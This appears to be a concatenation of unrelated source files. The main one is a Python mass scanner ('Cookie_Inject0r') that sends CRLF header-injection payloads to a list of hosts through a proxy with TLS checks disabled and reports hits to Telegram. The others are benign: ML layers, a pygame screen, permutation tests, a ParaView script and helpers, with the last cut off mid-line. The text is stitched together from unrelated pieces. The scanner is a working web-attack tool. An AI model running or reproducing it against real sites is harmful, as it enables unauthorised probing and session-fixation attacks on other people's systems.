<reponame>devcoinfet/Cookie_Inject0r
import requests
import uuid
import subprocess
import os
import sys
import binascii
import json
from urllib3.exceptions import InsecureRequestWarning
from threading import Thread, Lock
from multiprocessing import Process, cpu_count
import telegram
from urllib.parse import urlparse
import glob
import time
import ast
#token that can be generated talking with @BotFather on telegram
api_token = '<PASSWORD>'
chat_ids = ['chatisgoeshere']#,'@yourbotname']
session_proxied = requests.Session()
session_proxied.proxies = {
"http": "http://ilike_2rotate@proxyhost.com:80",
}
PROCESS = cpu_count() * 2
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
THREADS = 4
lock = Lock()
# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
false_positives = ['handl_landing_page','handl_url',
'handl_url','REQUEST','uri','URI','landingpage','Set-Cookie:']
vuln_cookies_found = []
def get_ips(dataset_path):
ips = []
file = open(dataset_path, "r")
dataset = list(filter(None, file.read().split("\n")))
for line in dataset:
# line = json.loads(line)
# ips.append(line['IP'])
ips.append(line.rstrip())
return ips
def ip_to_process(a, n):
# ode to devil the best coder i know ;)
k, m = divmod(len(a), n)
for i in range(n):
yield a[i * k + min(i, m):(i + 1) * k + min(i + 1, m)]
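    # e.g. list(ip_to_process([1, 2, 3, 4, 5], 2)) -> [[1, 2, 3], [4, 5]]:
    # the input list is split into n nearly equal-sized chunks, one per worker.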
def crlf_injection_tester(hosts_in):
for hosts in hosts_in:
domain = urlparse(hosts).netloc
cookie_scope = domain
cookie_rand = "BugBountyTestOnly"
url_pay = 'https://'+hosts+"/%0d%0aSet-Cookie:{}:{};domain={}".format(str(cookie_rand),str(cookie_rand),str(domain))
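        # %0d%0a is URL-encoded CR+LF: if the server reflects it unfiltered in a
        # response header, the injected Set-Cookie line may be honoured by the client.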
test_url = url_pay
try:
response = session_proxied.get(test_url,timeout=3,verify=False)
print(response.status_code)
if session_proxied.cookies:
cookies = session_proxied.cookies.get_dict()
for key in cookies.items():
if "__cfruid" or "__cfduid" in key:
print("We have a hit dodging WAF probably not Vuln")
pass
else:
for cook in key:
print(cook)
if cookie_rand in cook:
#todo check for false positive by looking for reflection in location type headrers
print("CRLF Injection Possibly Detected")
sys.exit()
tested_info = {}
tested_info['target_url'] = test_url
tested_info['cookie_set'] = cookie_rand
tested_info['cookies_returned'] = session_proxied.cookies.get_dict()
tested_info['is_vuln'] = True
vuln_cookies_found.append(json.dumps(tested_info))
print(json.dumps(tested_info))
try:
for chat_id in chat_ids:
#send_notification(tested_info,chat_id)
print("Mock Send")
except Exception as ex1:
print(ex1)
pass
else:
#print(json.dumps(tested_info))
pass
except Exception as issues:
print(str(issues))
pass
def send_notification(msg, chat_id, token=api_token):
"""
Send a mensage to a telegram user specified on chatId
chat_id must be a number!
"""
try:
bot = telegram.Bot(token=token)
bot.sendMessage(chat_id=chat_id, text=msg)
except Exception as ex:
print(ex)
pass
if __name__ == "__main__":
ip_list = get_ips(sys.argv[1])
ips = ip_to_process(ip_list, PROCESS)
    threads = []
    for _ in range(PROCESS):
        p = Thread(target=crlf_injection_tester, args=(next(ips),))
        p.daemon = True
        p.start()
        threads.append(p)
    # join every worker (joining `p` repeatedly only waits on the last thread started)
    for p in threads:
        p.join()
for result in vuln_cookies_found:
print(result)
| 2
| 2
|
wsdet/modules/models/base/assigner/builder.py
|
DetectionBLWX/WSDDN.pytorch
| 7
|
12783520
|
'''
Function:
    build the assigner
Author:
<NAME>
'''
from .maxiouassigner import MaxIoUAssigner
'''build the assigner'''
def BuildAssigner(cfg, **kwargs):
supported_assigners = {
'max_iou': MaxIoUAssigner,
}
    assert cfg['type'] in supported_assigners, 'unsupported assigner type %s...' % cfg['type']
return supported_assigners[cfg['type']](**cfg['opts'])
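# Usage sketch (the 'opts' keys below are illustrative assumptions, not taken from this repo):
#   assigner = BuildAssigner({'type': 'max_iou', 'opts': {'pos_iou_thr': 0.5, 'neg_iou_thr': 0.5}})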
| 2.390625
| 2
|
Classes_and_Object_Programs/cls1.py
|
saratkumar17mss040/Python-lab-programs
| 3
|
12783521
|
# simple class - general class -1
class StudentDetails:
name = 'sam'
age = 21
college = 'ABC'
average = 9.2
# class StudentDetails object
s1 = StudentDetails()
print('Student details')
print('Name:',s1.name)
print('Age:', s1.age)
print('College', s1.college)
print('Average', s1.average)
| 3.90625
| 4
|
screen/title.py
|
wooky/xtremettt
| 0
|
12783522
|
import pygame, assets
from options import OptionsScreen
class TitleScreen:
def __init__(self, screen):
self.screen = screen
big_font = pygame.font.SysFont(assets.font, 90)
small_font = pygame.font.SysFont(assets.font, 24)
self.heading = small_font.render("Super Extreme", True, (255,255,255))
self.title = big_font.render("TIC-TAC-TOE", True, (255,255,255))
self.title_shadow = big_font.render("TIC-TAC-TOE", True, (192,192,192))
self.start = small_font.render("Press ENTER to start!", True, (255,255,255))
self.title_shadow_rect = self.title_shadow.get_rect()
self.title_shadow_rect.center = (screen.get_width()/2, screen.get_height()/2)
self.title_rect = self.title_shadow_rect.move(-10, -10)
self.heading_rect = self.heading.get_rect()
self.heading_rect.topleft = self.title_rect.topleft
self.heading_rect.left -= 5
self.start_rect = self.start.get_rect()
self.start_rect.center = (self.title_shadow_rect.centerx, (self.title_rect.bottom + screen.get_height())/2)
def event(self, event):
if event.type == pygame.KEYDOWN and event.key == pygame.K_RETURN:
OptionsScreen.instance = OptionsScreen(self.screen)
return OptionsScreen.instance
else: return self
def logic(self):
assets.background.logic()
def draw(self):
self.screen.fill((0,0,0))
assets.background.draw()
self.screen.blit(self.title_shadow, self.title_shadow_rect)
self.screen.blit(self.title, self.title_rect)
self.screen.blit(self.heading, self.heading_rect)
self.screen.blit(self.start, self.start_rect)
| 2.875
| 3
|
moon.py
|
zhoudaxia233/icey
| 0
|
12783523
|
import random
import math
from PIL import Image
def sample(x, y, num_of_sample_directions=64):
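    # Estimates the light reaching (x, y) by averaging trace() over evenly spaced,
    # jittered directions (stratified Monte Carlo sampling over the full circle).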
s = 0.0
for i in range(num_of_sample_directions):
# random_rad = 2 * math.pi * random.uniform(0.0, 1.0)
random_rad = 2 * math.pi * (i + random.uniform(0.0, 1.0)) / num_of_sample_directions
s += trace(x, y, math.cos(random_rad), math.sin(random_rad))
return s / num_of_sample_directions # * 2 * math.pi
def trace(ox, oy, dx, dy):
t = 0.0
i = 0
while (i < 10) and (t < 2.0):
i += 1
sd = circleSDF(ox + dx * t, oy + dy * t, 0.5, 0.5, 0.1)
if sd < 1e-6: return 2.0
t += sd
return 0.0
def circleSDF(x, y, cx, cy, cr):
"""Return:
negative if (x, y) is inside the circle;
positive if (x, y) is outside the circle;
zero if (x, y) is on the circle
"""
return math.sqrt((x - cx) * (x - cx) + (y - cy) * (y - cy)) - cr
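# Quick sanity check of the sign convention (values worked out by hand, up to float rounding):
#   circleSDF(0.5, 0.5, 0.5, 0.5, 0.1) -> -0.1   # centre of the circle, inside
#   circleSDF(0.6, 0.5, 0.5, 0.5, 0.1) ->  0.0   # on the circle
#   circleSDF(0.8, 0.5, 0.5, 0.5, 0.1) ->  0.2   # outside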
def main():
width, height = 512, 512
img = Image.new('L', (width, height))
pixels = img.load()
for h in range(height):
for w in range(width):
pixels[h, w] = int(min(sample(h / float(height), w / float(width)) * 255.0, 255.0))
img.save("moon2.png")
if __name__ == '__main__':
main()
| 2.84375
| 3
|
utils/mongodb.py
|
josemcorderoc/twitterconstituyente
| 0
|
12783524
|
from pymongo.errors import BulkWriteError
import logging
import time
import tqdm
import tweepy
logging.basicConfig(format='[%(asctime)s] - %(name)s - %(funcName)s - %(levelname)s : %(message)s', level=logging.INFO)
log = logging.getLogger(__name__)
def bulk_write_to_mongo(collection, data):
to_insert = len(data)
try:
if to_insert > 0:
collection.insert_many(data, ordered=False)
return to_insert, 0
except BulkWriteError as e:
log.error("BulkWriteError")
inserted = e.details["nInserted"]
return inserted, to_insert - inserted
def download_timeline(user_id: str, n: int = 3200, count: int = 200, trim_user=True, tweet_mode="extended", **kwargs):
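    # NOTE: relies on a module-level tweepy client named `api` (e.g. api = tweepy.API(auth))
    # being configured elsewhere before this function is called.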
log.info(f'Downloading timeline from user id: {user_id}')
start_time = time.time()
tweets = [status for status in tqdm.tqdm(tweepy.Cursor(
api.user_timeline,
user_id=user_id,
count=count,
trim_user=trim_user,
tweet_mode=tweet_mode,
**kwargs).items(n), total=n)]
total_time = time.time() - start_time
log.info(f"Downloaded finished: {len(tweets)} tweets in {total_time:.4f} seconds.")
return tweets
| 2.578125
| 3
|
main.py
|
VIVelev/Flappy-AI
| 3
|
12783525
|
<gh_stars>1-10
import numpy as np
from Game.main import Game
from NeuroEvolution.Population import Population
N_BIRDS = 15
MUTATION_RATE = 0.02
N_WINNERS = 2
pop = Population(N_BIRDS, MUTATION_RATE, n_winners=N_WINNERS)
game = Game(pop, n_birds=N_BIRDS)
game.run()
| 2.40625
| 2
|
basic/annotationtable.py
|
ChaitanyaArora/text2image
| 10
|
12783526
|
<reponame>ChaitanyaArora/text2image
import os
from common import ROOT_PATH
def niceName(qid):
return '0'if qid[1:-2] == '' else qid[1:-2]
def readAnnotations(inputfile, skip_0=True):
data = [(str.split(x)[0], int(str.split(x)[1])) for x in open(inputfile).readlines()]
names = [x[0] for x in data]
labels = [x[1] for x in data]
if skip_0:
idx = [i for i in range(len(names)) if labels[i] != 0]
names = [names[x] for x in idx]
labels = [labels[x] for x in idx]
return (names, labels)
def readAnnotationsFrom(collection, annotationName, concept, skip_0=True, rootpath=ROOT_PATH):
annotationfile = os.path.join(rootpath, collection, "Annotations", "Image", annotationName, concept + ".txt")
if not os.path.exists(annotationfile):
annotationfile = os.path.join(rootpath, collection, "Annotations", "Image", annotationName, niceName(concept), concept + ".txt")
return readAnnotations(annotationfile, skip_0)
def readConcepts(collection, annotationName, rootpath=ROOT_PATH):
conceptfile = os.path.join(rootpath, collection, "Annotations", annotationName)
return [x.strip() for x in open(conceptfile).readlines() if x.strip()]
def writeConcepts(concepts, resultfile):
try:
os.makedirs(os.path.split(resultfile)[0])
except Exception, e:
#print e
pass
fout = open(resultfile, "w")
fout.write("\n".join(concepts) + "\n")
fout.close()
def writeConceptsTo(concepts, collection, annotationName, rootpath=ROOT_PATH):
resultfile = os.path.join(rootpath, collection, "Annotations", annotationName)
writeConcepts(concepts, resultfile)
def writeAnnotations(names, labels, resultfile):
try:
os.makedirs(os.path.split(resultfile)[0])
except:
pass
fout = open(resultfile, "w")
fout.write("".join(["%s %g\n" % (im,lab) for (im,lab) in zip(names,labels)]))
fout.close()
def writeAnnotationsTo(names, labels, collection, annotationName, concept, rootpath=ROOT_PATH):
annotationfile = os.path.join(rootpath, collection, "Annotations", "Image", annotationName, concept + ".txt")
writeAnnotations(names, labels, annotationfile)
def readQueries(inputfile):
data = [ str.split(x, " ", 1) for x in open(inputfile).readlines()]
qids = [x[0] for x in data]
queries = [x[1].rstrip('\n') for x in data]
return (qids, queries)
def readQueriesFrom(collection, rootpath=ROOT_PATH):
queryfile = os.path.join(rootpath, collection, "Annotations", "qid.text.txt")
return readQueries(queryfile)
| 2.703125
| 3
|
src/copy_mechanism/copy_layer.py
|
Ravi-0809/question-generation
| 212
|
12783527
|
from typing import Callable
from tensorflow.python.layers import base
from tensorflow.python.eager import context
from tensorflow.python.estimator import util as estimator_util
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import utils as layers_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.ops import variables as tf_variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import nest
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import base
from tensorflow.python.layers import utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import standard_ops
from tensorflow.contrib.layers import fully_connected
import tensorflow as tf
import sys
from helpers.misc_utils import debug_tensor, debug_shape
from helpers.ops import safe_log
FLAGS = tf.app.flags.FLAGS
class CopyLayer(base.Layer):
"""Densely-connected layer class.
This layer implements the operation:
`outputs = activation(inputs * kernel + bias)`
Where `activation` is the activation function passed as the `activation`
argument (if not `None`), `kernel` is a weights matrix created by the layer,
and `bias` is a bias vector created by the layer
(only if `use_bias` is `True`).
Note: if the input to the layer has a rank greater than 2, then it is
flattened prior to the initial matrix multiply by `kernel`.
Arguments:
units: Integer or Long, dimensionality of the output space.
activation: Activation function (callable). Set it to None to maintain a
linear activation.
use_bias: Boolean, whether the layer uses a bias.
kernel_initializer: Initializer function for the weight matrix.
If `None` (default), weights are initialized using the default
initializer used by `tf.get_variable`.
bias_initializer: Initializer function for the bias.
kernel_regularizer: Regularizer function for the weight matrix.
bias_regularizer: Regularizer function for the bias.
activity_regularizer: Regularizer function for the output.
kernel_constraint: An optional projection function to be applied to the
kernel after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
bias_constraint: An optional projection function to be applied to the
bias after being updated by an `Optimizer`.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: String, the name of the layer. Layers with the same name will
share weights, but to avoid mistakes we require reuse=True in such cases.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
Properties:
units: Python integer, dimensionality of the output space.
activation: Activation function (callable).
use_bias: Boolean, whether the layer uses a bias.
kernel_initializer: Initializer instance (or name) for the kernel matrix.
bias_initializer: Initializer instance (or name) for the bias.
kernel_regularizer: Regularizer instance for the kernel matrix (callable)
bias_regularizer: Regularizer instance for the bias (callable).
activity_regularizer: Regularizer instance for the output (callable)
kernel_constraint: Constraint function for the kernel matrix.
bias_constraint: Constraint function for the bias.
kernel: Weight matrix (TensorFlow variable or tensor).
bias: Bias vector, if applicable (TensorFlow variable or tensor).
"""
def __init__(self, embedding_dim,
units,
switch_units=64,
activation=None,
use_bias=False,
kernel_initializer=None,
bias_initializer=init_ops.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
trainable=True,
name=None,
source_provider: Callable[[], tf.Tensor] = None,
source_provider_sl: Callable[[], tf.Tensor] = None,
condition_encoding: Callable[[], tf.Tensor] = None,
output_mask: Callable[[], tf.Tensor] = None,
training_mode=False,
vocab_size=None,
context_as_set=False,
max_copy_size=None,
mask_oovs=False,
**kwargs):
super(CopyLayer, self).__init__(trainable=trainable, name=name,
activity_regularizer=activity_regularizer,
**kwargs)
self.vocab_size = vocab_size
self.source_provider = source_provider
self.source_provider_sl = source_provider_sl
self.embedding_dim = embedding_dim
self.units = units
self.switch_units = switch_units
self.activation = activation
self.use_bias = use_bias
self.kernel_initializer = kernel_initializer
self.bias_initializer = bias_initializer
self.kernel_regularizer = kernel_regularizer
self.bias_regularizer = bias_regularizer
self.kernel_constraint = kernel_constraint
self.bias_constraint = bias_constraint
self.input_spec = base.InputSpec(min_ndim=2)
self.training_mode=training_mode
# self.output_mask=output_mask
self.max_copy_size=max_copy_size
self.mask_oovs = mask_oovs
self.context_as_set=context_as_set
self.condition_encoding = condition_encoding
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
# print("building copy layer")
# print(input_shape)
self.built = True
def call(self, inputs):
inputs = ops.convert_to_tensor(inputs, dtype=self.dtype) # batch x len_source+emb_dim
# inputs = debug_shape(inputs, "inputs")
# print(inputs)
# [batch_size, emb_dim + len_source] in eval,
# [len_target, batch_size,emb_dim + len_source] in train
source = self.source_provider() # [batch_size, len_source]
# source = debug_shape(source,"src")
source_sl = self.source_provider_sl()
condition_encoding = self.condition_encoding()
# condition_encoding = debug_shape(condition_encoding, "cond enc")
batch_size = tf.shape(source)[0]
len_source = tf.shape(source)[1]
shape = tf.shape(inputs)
is_eval = len(inputs.get_shape()) == 2
beam_width = tf.constant(1) if is_eval else shape[1]
# len_target = tf.Print(len_target, [len_target, batch_size, shape[-1]], "input reshape")
# inputs = tf.reshape(inputs, [-1, shape[-1]]) # [len_target * batch_size, len_source + emb_dim]
inputs_new = tf.reshape(inputs,
[batch_size*beam_width, shape[-1]]) # [len_target, batch_size, len_source + emb_dim]
# inputs_new = debug_shape(inputs_new, "inputs_new")
# -- [len_target, batch_size, embedding_dim] attention, []
# -- [len_target, batch_size, len_source] alignments
# attention, alignments = tf.split(inputs, [self.embedding_dim, -1], axis=1)
attention, alignments = tf.split(inputs_new, num_or_size_splits=[self.embedding_dim, -1], axis=-1)
# [len_target, batch_size, vocab_size]
if FLAGS.out_vocab_cpu:
with tf.device('/cpu:*'):
shortlist = tf.layers.dense(attention, self.vocab_size, activation=tf.nn.softmax, use_bias=False)
else:
shortlist = tf.layers.dense(attention, self.vocab_size, activation=tf.nn.softmax, use_bias=False)
# attention = debug_shape(attention, "attn")
# alignments = debug_shape(alignments, "align ("+str(self.units)+" desired)")
# alignments = debug_tensor(alignments, "alignments")
# print(alignments)
# shortlist = debug_shape(shortlist, "shortlist")
# TEMP: kill OOVs
s = tf.shape(shortlist)
mask = tf.concat([tf.ones((s[0],1)),tf.zeros((s[0],1)),tf.ones((s[0],s[1]-2))], axis=1)
shortlist = tf.cond(self.mask_oovs, lambda: shortlist * mask, lambda: shortlist)
# pad the alignments to the longest possible source st output vocab is fixed size
# TODO: Check for non zero alignments outside the seq length
# alignments_padded = debug_shape(alignments_padded, "align padded")
# switch takes st, vt and yt−1 as inputs
# vt = concat(weighted context encoding at t; condition encoding)
# st = hidden state at t
# y_t-1 is previous generated token
condition_encoding_tiled = tf.contrib.seq2seq.tile_batch(condition_encoding, multiplier=beam_width)
vt = tf.concat([attention, condition_encoding_tiled], axis=1)
# NOTE: this is missing the previous input y_t-1 and s_t
switch_input = tf.concat([vt],axis=1)
switch_h1 = tf.layers.dropout(tf.layers.dense(switch_input, self.switch_units, activation=tf.nn.tanh, kernel_initializer=tf.glorot_uniform_initializer()), rate=0.3, training=self.training_mode)
switch_h2 = tf.layers.dropout(tf.layers.dense(switch_h1, self.switch_units, activation=tf.nn.tanh, kernel_initializer=tf.glorot_uniform_initializer()), rate=0.3, training=self.training_mode)
self.switch = tf.layers.dense(switch_h2, 1, activation=tf.sigmoid, kernel_initializer=tf.glorot_uniform_initializer())
# switch = debug_shape(switch, "switch")
if FLAGS.disable_copy:
self.switch = 0
elif FLAGS.disable_shortlist:
self.switch = 1
# if self.output_mask is not None:
# alignments = self.output_mask() * alignments
source_tiled = tf.contrib.seq2seq.tile_batch(source, multiplier=beam_width)
source_tiled_sl = tf.contrib.seq2seq.tile_batch(source_sl, multiplier=beam_width)
shortlist = (1-self.switch)*shortlist
alignments = self.switch*alignments
# Take any tokens that are the same in either vocab and combine their probabilities
# old: mult by a big sparse matrix - not v mem efficient..
# opt1: mult the copy dist by a vocab x copy matrix and add to vocab part
# opt2: do an nd_gather to copy the relevant prob mass, then mask carefully to remove it
if FLAGS.combine_vocab:
# copy everything in real shortlist except special toks
# print(len_source, self.max_copy_size)
source_tiled_sl_padded = tf.pad(source_tiled_sl, [[0, 0], [0, self.max_copy_size-tf.shape(source_tiled_sl)[-1]]], 'CONSTANT', constant_values=0)
# attempt 2!
batch_ix = tf.tile(tf.expand_dims(tf.range(batch_size*beam_width),axis=-1),[1,len_source])
# seq_ix = tf.tile(tf.expand_dims(tf.range(len_source),axis=0),[batch_size*beam_width,1])
tgt_indices = tf.reshape(tf.concat([tf.expand_dims(batch_ix,-1),tf.expand_dims(source_tiled_sl,-1)], axis=2),[-1,2])
ident_indices = tf.where(tf.greater(source_tiled_sl, -1)) # get ixs of all elements
# ident_indices = tf.where()
# tgt_indices = debug_tensor(tgt_indices)
# get the copy probs at each point in the source..
updates = tf.reshape(tf.gather_nd(alignments, ident_indices),[-1])
# and send them to the their shortlist index
sum_part = tf.scatter_nd(tgt_indices, updates, [batch_size*beam_width, self.vocab_size+self.max_copy_size])
# then zero out the ix's that got copied
align_zeroed = alignments * tf.cast(tf.greater_equal(source_tiled_sl,self.vocab_size),tf.float32)
align_moved = alignments * tf.cast(tf.less(source_tiled_sl,self.vocab_size),tf.float32) # ie only let through stuff that *isnt* in SL
# and add the correct pieces together
alignments = align_zeroed
shortlist = shortlist + sum_part[:,:self.vocab_size]
# result = tf.Print(result, [tf.reduce_sum(result[:,:self.vocab_size],-1)], "result sl sum")
# shortlist = tf.Print(shortlist, [tf.reduce_sum(align_moved,-1)], "sum align_moved")
# shortlist = tf.Print(shortlist, [tf.reduce_sum(sum_part[:,:self.vocab_size],-1)], "sum sum_part")
# convert position probs to ids
if self.context_as_set:
# print(source) # batch x seq
# print(alignments) # batch x seq
pos_to_id = tf.one_hot(source_tiled-self.vocab_size, depth=self.max_copy_size) # batch x seq x vocab
if FLAGS.maxout_pointer:
copy_dist = tf.reduce_max(pos_to_id * tf.expand_dims(alignments, 2), axis=1)
else:
copy_dist = tf.squeeze(tf.matmul(tf.expand_dims(alignments,1), pos_to_id), axis=1)
else:
copy_dist=alignments
copy_dist_padded = tf.pad(copy_dist, [[0, 0], [0, self.max_copy_size-tf.shape(copy_dist)[-1]]], 'CONSTANT', constant_values=0)
result = tf.concat([shortlist,copy_dist_padded], axis=1) # this used to be safe_log'd
# if FLAGS.combine_vocab:
# result = tf.Print(result, [tf.reduce_sum(result,-1)], "result sum")
target_shape = tf.concat([shape[:-1], [-1]], 0)
result =tf.reshape(result, target_shape)
return result
# return tf.Print(result, [tf.reduce_max(switch), tf.reduce_max(shortlist),
# tf.reduce_max(alignments)], summarize=10)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
input_shape = input_shape.with_rank_at_least(2)
# print(input_shape)
if input_shape[-1].value is None:
raise ValueError(
'The innermost dimension of input_shape must be defined, but saw: %s'
% input_shape)
return input_shape[:-1].concatenate(self.units+self.vocab_size if not self.context_as_set else self.vocab_size+self.max_copy_size)
# this for older tf versions
def _compute_output_shape(self, input_shape):
return self.compute_output_shape(input_shape)
def dense(
inputs, units,
activation=None,
use_bias=True,
kernel_initializer=None,
bias_initializer=init_ops.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
trainable=True,
name=None,
reuse=None):
"""Functional interface for the densely-connected layer.
This layer implements the operation:
`outputs = activation(inputs.kernel + bias)`
Where `activation` is the activation function passed as the `activation`
argument (if not `None`), `kernel` is a weights matrix created by the layer,
and `bias` is a bias vector created by the layer
(only if `use_bias` is `True`).
Note: if the `inputs` tensor has a rank greater than 2, then it is
flattened prior to the initial matrix multiply by `kernel`.
Arguments:
inputs: Tensor input.
units: Integer or Long, dimensionality of the output space.
activation: Activation function (callable). Set it to None to maintain a
linear activation.
use_bias: Boolean, whether the layer uses a bias.
kernel_initializer: Initializer function for the weight matrix.
If `None` (default), weights are initialized using the default
initializer used by `tf.get_variable`.
bias_initializer: Initializer function for the bias.
kernel_regularizer: Regularizer function for the weight matrix.
bias_regularizer: Regularizer function for the bias.
activity_regularizer: Regularizer function for the output.
kernel_constraint: An optional projection function to be applied to the
kernel after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
bias_constraint: An optional projection function to be applied to the
bias after being updated by an `Optimizer`.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: String, the name of the layer.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
Returns:
Output tensor.
Raises:
ValueError: if eager execution is enabled.
"""
layer = CopyLayer(units,
activation=activation,
use_bias=use_bias,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
activity_regularizer=activity_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint,
trainable=trainable,
name=name,
dtype=inputs.dtype.base_dtype,
_scope=name,
_reuse=reuse)
print("inside copy layer, yaaay!")
sys.exit(0)
return layer.apply(inputs)
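# Hedged sketch (added for illustration; not part of the original model code): the layer's
# output concatenates the generator ("shortlist") distribution over the fixed vocabulary with
# a copy distribution over source positions, padded out to max_copy_size. A minimal numpy
# analogue of that final combination step:
#
#   import numpy as np
#   shortlist = np.array([[0.5, 0.2, 0.2, 0.1]])            # batch x vocab_size
#   copy_dist = np.array([[0.7, 0.3]])                      # batch x source_len
#   max_copy_size = 3
#   copy_dist_padded = np.pad(copy_dist, [(0, 0), (0, max_copy_size - copy_dist.shape[-1])])
#   combined = np.concatenate([shortlist, copy_dist_padded], axis=1)  # batch x (vocab_size + max_copy_size)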
| 2.265625
| 2
|
tests/math/perm_test.py
|
muhrin/e3nn
| 1
|
12783528
|
import math
import pytest
from e3nn.math import perm
@pytest.mark.parametrize('n', [0, 1, 2, 3, 4, 5])
def test_inverse(n):
for p in perm.group(n):
ip = perm.inverse(p)
assert perm.compose(p, ip) == perm.identity(n)
assert perm.compose(ip, p) == perm.identity(n)
@pytest.mark.parametrize('n', [0, 1, 2, 3, 4, 5])
def test_int_inverse(n):
for j in range(math.factorial(n)):
p = perm.from_int(j, n)
i = perm.to_int(p)
assert i == j
@pytest.mark.parametrize('n', [0, 1, 2, 3, 4, 5])
def test_int_injection(n):
group = {perm.from_int(j, n) for j in range(math.factorial(n))}
assert len(group) == math.factorial(n)
def test_germinate():
assert perm.is_group(perm.germinate({(1, 2, 3, 4, 0)}))
assert perm.is_group(perm.germinate({(1, 0, 2, 3), (0, 2, 1, 3), (0, 1, 3, 2)}))
@pytest.mark.parametrize('n', [0, 1, 2, 3, 4, 5])
def test_rand(n):
    assert perm.is_perm(perm.rand(n))
def test_not_group():
assert not perm.is_group(set()) # empty
assert not perm.is_group({(1, 0, 2), (0, 2, 1), (1, 2, 0), (2, 0, 1), (2, 1, 0)}) # missing neutral
assert not perm.is_group({(0, 1, 2), (1, 2, 0)}) # missing inverse
| 2.625
| 3
|
north-greenland/Elmer/4a_DIAGNOSTIC/PlotScript.py
|
ElmerCSC/ElmerIceCourses
| 0
|
12783529
|
<gh_stars>0
from paraview.simple import *
import sys
sys.path.append('../../Codes/PostProcessing')
from ToStreamLine import *
from PlotGroundingLine import *
"""
Simple script to show how to use pvpython to automatise
post processing
"""
StreamLine="../../Data/StreamLine/StreamLine.csv"
SaveFile="ResOnStreamLine.csv"
vtuFile='MESH_1/RUN1__t0001.vtu'
# read vtu file
vtu = XMLUnstructuredGridReader(FileName=vtuFile)
# Show results
renderView1 = GetActiveViewOrCreate('RenderView')
renderView1.ViewSize = [600, 600]
Display = Show(vtu, renderView1)
# set scalar coloring
ColorBy(Display, ('POINTS', 'ssavelocity', 'Magnitude'))
ssavelocityLUT = GetColorTransferFunction('ssavelocity')
ssavelocityLUT.MapControlPointsToLogSpace()
ssavelocityLUT.UseLogScale = 1
ssavelocityLUT.RescaleTransferFunction(1.0, 2000.0)
## plot Grounding line edges
SetActiveSource(vtu)
GLEdges()
## plot Grounding line from flotation
SetActiveSource(vtu)
GLFlot()
## resample stream Line
SetActiveSource(vtu)
Resample(StreamLine)
## save resampled
SaveResampled(SaveFile)
## Save screenshot
# current camera placement for renderView1
renderView1.InteractionMode = '2D'
renderView1.CameraPosition = [-249524.47156507644, -1022008.0234601084, 10000.0]
renderView1.CameraFocalPoint = [-249524.47156507644, -1022008.0234601084, 0.0]
renderView1.CameraParallelScale = 226895.9823084111
SaveScreenshot('map.png')
## make pv 2D plots
FlowLinePlot()
## save screenshot
layout = GetLayoutByName("FlowLine Layout")
SaveScreenshot('Stream.png', layout, SaveAllViews=1)
| 2.21875
| 2
|
2017/day_01/day_01.py
|
viddrobnic/adventofcode
| 0
|
12783530
|
l = list(map(int, input()))
s_1, s_2 = 0, 0
for i in range(len(l)):
s_1 += l[i] if l[i] == l[(i + 1) % len(l)] else 0
s_2 += l[i] if l[i] == l[(i + len(l) // 2) % len(l)] else 0
print('Part One: {}\nPart Two: {}'.format(s_1, s_2))
| 3.3125
| 3
|
server/processes/services/schedule_checker.py
|
CloudReactor/task_manager
| 0
|
12783531
|
from typing import Generic, Optional, TypeVar
from abc import ABCMeta, abstractmethod
from datetime import datetime, timedelta
import logging
from crontab import CronTab
from dateutil.relativedelta import *
from django.db import transaction
from django.utils import timezone
from processes.common.request_helpers import context_with_request
from processes.models import (
Alert, AlertSendStatus, AlertMethod, MissingScheduledExecution,
Schedulable
)
MIN_DELAY_BETWEEN_EXPECTED_AND_ACTUAL_SECONDS = 300
MAX_EARLY_STARTUP_SECONDS = 60
MAX_STARTUP_SECONDS = 10 * 60
MAX_SCHEDULED_LATENESS_SECONDS = 30 * 60
logger = logging.getLogger(__name__)
BoundSchedulable = TypeVar('BoundSchedulable', bound=Schedulable)
class ScheduleChecker(Generic[BoundSchedulable], metaclass=ABCMeta):
def check_all(self) -> None:
model_name = self.model_name()
for schedulable in self.manager().filter(enabled=True).exclude(schedule='').all():
logger.info(f"Found {model_name} {schedulable} with schedule {schedulable.schedule}")
try:
self.check_execution_on_time(schedulable)
except Exception:
logger.exception(f"check_all() failed on {model_name} {schedulable.uuid}")
def check_execution_on_time(self, schedulable: BoundSchedulable) \
-> Optional[MissingScheduledExecution]:
model_name = self.model_name()
schedule = schedulable.schedule.strip()
if not schedule:
logger.warning(f"For schedulable entity {schedulable.uuid}, schedule '{schedule}' is blank, skipping")
return None
mse: Optional[MissingScheduledExecution] = None
m = Schedulable.CRON_REGEX.match(schedule)
if m:
cron_expr = m.group(1)
logger.info(
